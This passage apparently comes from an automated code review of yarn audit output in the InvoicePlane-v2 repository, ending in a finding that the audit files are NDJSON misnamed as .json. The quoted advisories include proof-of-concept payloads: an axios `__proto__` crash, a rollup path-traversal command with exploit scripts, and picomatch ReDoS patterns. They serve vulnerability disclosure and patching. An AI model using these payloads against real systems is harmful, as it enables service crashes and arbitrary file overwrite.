Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115549,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115549,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. 
The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115552,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115552,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. 
Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditSummary","data":{"vulnerabilities":{"info":0,"low":0,"moderate":3,"high":5,"critical":0},"dependencies":156,"devDependencies":0,"optionalDependencies":0,"totalDependencies":156}}
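Review bot: the `auditSummary` record on the final line counts one entry per dependency path, not per advisory, so "5 high, 3 moderate" overstates the distinct issues: the records in this file reduce to four advisories (GHSA-43fc-jf86-j433 for axios, GHSA-mw96-cpmx-2vgc for rollup, and GHSA-c2c7-rcm5-vvqj plus GHSA-3v7f-55p6-f55p for picomatch), with the two picomatch advisories repeated once for each of `laravel-vite-plugin>vite-plugin-full-reload>picomatch`, `vite>picomatch` and `vite>tinyglobby>picomatch` under the same `advisory.id`. The bucket a finding lands in also comes from the `severity` field rather than the CVSS data (the rollup record is `severity: high` with `cvss.score: 0` and a null vector), so the counts should not be read as a CVSS-based ranking. When this file is used to decide whether a run actually closed anything, de-duplicate by `github_advisory_id` and compare each path's found version against `patched_versions` (picomatch 2.3.1 vs `>=2.3.2` and 4.0.3 vs `>=4.0.4`, rollup 4.54.0 vs `>=4.59.0` are all still open here); those transitive findings need a Yarn `resolutions` entry or a follow-up bump, since nothing in these records shows them resolved.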

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

web_search
Yarn audit --json output format NDJSON line-delimited

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 165


🏁 Script executed:

# Check if there are any audit-related files or scripts in the repo
git ls-files | grep -i audit

# Look for any scripts or tooling that processes audit files
rg -i "audit.*json|audit.*report" --type js --type json --type yaml --type toml -A 3

# Check for ESLint, Biome, or other linter configs that might validate JSON
fd -i "biome.json|eslint|prettier" -o ".json" | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 50533


🏁 Script executed:

# Check for linter configs
fd -type f \( -name "biome.json" -o -name ".eslintrc*" -o -name "prettier.config.*" -o -name ".prettierrc*" \)

# Search for package.json to see if there are audit-related scripts
fd package.json -type f -exec head -100 {} \;

# Check if audit files are referenced anywhere in the codebase
rg "audit-before|audit-report" --type json --type yaml --type js -i

# Look for GitHub Actions workflows
fd "\.github" -type d

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 584


🏁 Script executed:

# Check for any CI/workflow files that reference audit
fd "\.yml$|\.yaml$" .github -type f 2>/dev/null | head -5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 54


🏁 Script executed:

# Check for GitHub Actions workflows
find .github -name "*.yml" -o -name "*.yaml" 2>/dev/null | head -10

# Check for biome.json
find . -maxdepth 3 -name "biome.json" 2>/dev/null

# Search for package.json
find . -maxdepth 3 -name "package.json" 2>/dev/null | head -3

# Check for references to audit files
rg "audit-before|audit-report" -i --max-count 10

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 457


🏁 Script executed:

# Check if there's a biome config that would validate JSON
cat biome.json 2>/dev/null || echo "No biome.json found"

# Check root package.json for audit-related scripts
if [ -f package.json ]; then head -50 package.json; fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 1742


🏁 Script executed:

# Check if any CI workflow references the audit files or JSON linting
rg "biome|lint|audit" .github/workflows/ -i

# Check if there are any issues or discussions about JSON parsing
find . -name "*.md" -type f | xargs rg "audit.*json|ndjson|jsonl" -i 2>/dev/null | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 2337


🏁 Script executed:

# Search for any error messages or notes about the audit files
rg "End of file|parse.*error" --type md --type txt -i | head -10

# Check the actual structure of the files more carefully
head -1 audit-before.json | wc -c
tail -1 audit-before.json | wc -c

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 80


🏁 Script executed:

# Check if audit files are in .gitignore
cat .gitignore | grep -i audit

# Check if audit files are actually committed to the repo
git ls-files | grep -E "audit.*json"

# Get the actual workflow file to see the full context
cat .github/workflows/yarn-update.yml | head -100

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 3533


🏁 Script executed:

# Check if these files are actually in git history
git log --all --full-history -- "audit-before.json" "audit-report.json" | head -20

# Check git status to see if they're tracked
git status --short | grep -i audit

# Verify they're in .gitignore
cat .gitignore | grep -E "audit.*json"

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 776


🏁 Script executed:

# Double check - are they in gitignore?
grep "^audit-before.json$" .gitignore && echo "Found in gitignore" || echo "NOT in gitignore"
grep "^audit-report.json$" .gitignore && echo "Found in gitignore" || echo "NOT in gitignore"

# Are they currently tracked in git?
git ls-files | grep "audit.*json"

# Check if Biome actually validates JSON files by default - search docs or config
cat biome.json | grep -i json -A 5 -B 5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 283


🏁 Script executed:

# Let's test if NDJSON in a .json file would actually cause Biome to fail
# First check Biome version
cat biome.json | grep schema

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 133


🏁 Script executed:

# Check if Biome would validate .json files - search for any biome issues or configs
# about JSON validation
cat biome.json | grep -A 20 "json"

# Let's see if there's any CI that runs biome
grep -r "biome" .github/workflows/ 2>/dev/null

# Try to understand if this NDJSON actually causes issues
# Parse the first line to verify it's valid JSON
head -1 audit-before.json | python3 -m json.tool > /dev/null 2>&1 && echo "Line 1 is valid JSON" || echo "Line 1 is NOT valid JSON"

# Try to parse the entire file as single JSON
python3 -m json.tool audit-before.json > /dev/null 2>&1 && echo "File parses as single JSON" || echo "File does NOT parse as single JSON (expected for NDJSON)"

# Check if NDJSON parsing works
python3 << 'EOF'
import json
valid_lines = 0
try:
    with open('audit-before.json', 'r') as f:
        for line_num, line in enumerate(f, 1):
            if line.strip():
                try:
                    json.loads(line)
                    valid_lines += 1
                except json.JSONDecodeError as e:
                    print(f"Line {line_num} JSON error: {e}")
                    break
    print(f"Successfully parsed {valid_lines} valid JSON objects from NDJSON file")
except Exception as e:
    print(f"Error: {e}")
EOF

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 821


🏁 Script executed:

# Check if there are any biome reports or CI failures
git log --all --oneline -- audit-before.json audit-report.json | head -10

# Check if Biome would validate JSON by default
# Look for any JSON-specific rules
cat biome.json | grep -i "json" -B 5 -A 5

# Check if the files ever caused any CI issues
grep -r "audit-before\|audit-report" .github/ --include="*.yml" -A 2 -B 2 | grep -i "error\|fail" || echo "No error/fail patterns found"

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 679


🏁 Script executed:

# Let me check if Biome 2.4.9 actually validates JSON files
# Check the Biome JSON configuration more comprehensively
grep -A 50 '"json"' biome.json || echo "No JSON config section found"

# Check if there's a separate json section in biome config
python3 << 'EOF'
import json
with open('biome.json', 'r') as f:
    config = json.load(f)
    if 'json' in config:
        print("JSON config found:")
        print(json.dumps(config['json'], indent=2))
    else:
        print("No 'json' section in biome.json")
EOF

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 132


🏁 Script executed:

# Final check: run Biome on the audit files to see if it actually reports errors
# This will tell us if the review comment's claim about parse errors is accurate
if command -v biome &> /dev/null; then
    biome check audit-before.json audit-report.json 2>&1 | head -20
else
    echo "Biome not installed in sandbox"
fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 38788


Fix the audit file format: these are NDJSON, not JSON.

Both audit-before.json and audit-report.json contain line-delimited JSON from yarn audit --json, which Biome is already flagging with "End of file expected" errors starting at line 2. Either rename them to .jsonl or .ndjson and exclude from JSON linting, or wrap all records in a single JSON array before committing.

🧰 Tools
🪛 Biome (2.4.9)

[error] 2-2: End of file expected

(parse)


[error] 3-3: End of file expected

(parse)


[error] 4-4: End of file expected

(parse)


[error] 5-5: End of file expected

(parse)


[error] 6-6: End of file expected

(parse)


[error] 7-7: End of file expected

(parse)


[error] 8-8: End of file expected

(parse)


[error] 9-9: End of file expected

(parse)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@audit-before.json` around lines 1 - 9, audit-before.json and
audit-report.json contain line-delimited JSON (NDJSON) but are named/treated as
regular JSON causing lint errors; convert them to proper NDJSON or valid JSON:
either rename both files to .ndjson or .jsonl (audit-before.ndjson,
audit-report.ndjson) and update any references, or wrap the newline-delimited
records into a single JSON array; alternatively add an exclusion for these
filenames in the JSON lint/Biome config so they are not parsed as JSON. Ensure
you apply the same change for both audit-before.json and audit-report.json and
update any CI/README references so tooling continues to find them.

Comment on lines +1 to +9
{"type":"auditAdvisory","data":{"resolution":{"id":1113275,"path":"axios","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"1.13.2","paths":["axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\n- https://github.com/axios/axios/pull/7369\n- https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\n- https://github.com/axios/axios/releases/tag/v1.13.5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25639\n- https://github.com/axios/axios/pull/7388\n- https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\n- https://github.com/axios/axios/releases/tag/v0.30.3\n- https://github.com/advisories/GHSA-43fc-jf86-j433","created":"2026-02-09T17:46:14.000Z","id":1113275,"npm_advisory_id":null,"overview":"# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. 
The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. 
The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","reported_by":null,"title":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig","metadata":null,"cves":["CVE-2026-25639"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":">=1.0.0 <=1.13.4","github_advisory_id":"GHSA-43fc-jf86-j433","recommendation":"Upgrade to version 1.13.5 or later","patched_versions":">=1.13.5","updated":"2026-02-18T17:16:29.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-754"],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1113515,"path":"vite>rollup","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.54.0","paths":["vite>rollup"]}],"found_by":null,"deleted":null,"references":"- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc","created":"2026-02-25T22:37:26.000Z","id":1113515,"npm_advisory_id":null,"overview":"### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). 
\n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. 
Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup's regex fails to strip dots and slashes, \n // allowing path traversal sequences like '../'\n return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, 'dist');\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || 'bundle.js');\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the 'dist' folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped 'dist' folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n\n\n### Impact\nThis is a **High** level of severity 
vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.","reported_by":null,"title":"Rollup 4 has Arbitrary File Write via Path Traversal","metadata":null,"cves":["CVE-2026-27606"],"access":"public","severity":"high","module_name":"rollup","vulnerable_versions":">=4.0.0 <4.59.0","github_advisory_id":"GHSA-mw96-cpmx-2vgc","recommendation":"Upgrade to version 4.59.0 or later","patched_versions":">=4.59.0","updated":"2026-02-25T22:37:27.000Z","cvss":{"score":0,"vectorString":null},"cwe":["CWE-22"],"url":"https://github.com/advisories/GHSA-mw96-cpmx-2vgc"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. 
The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. 
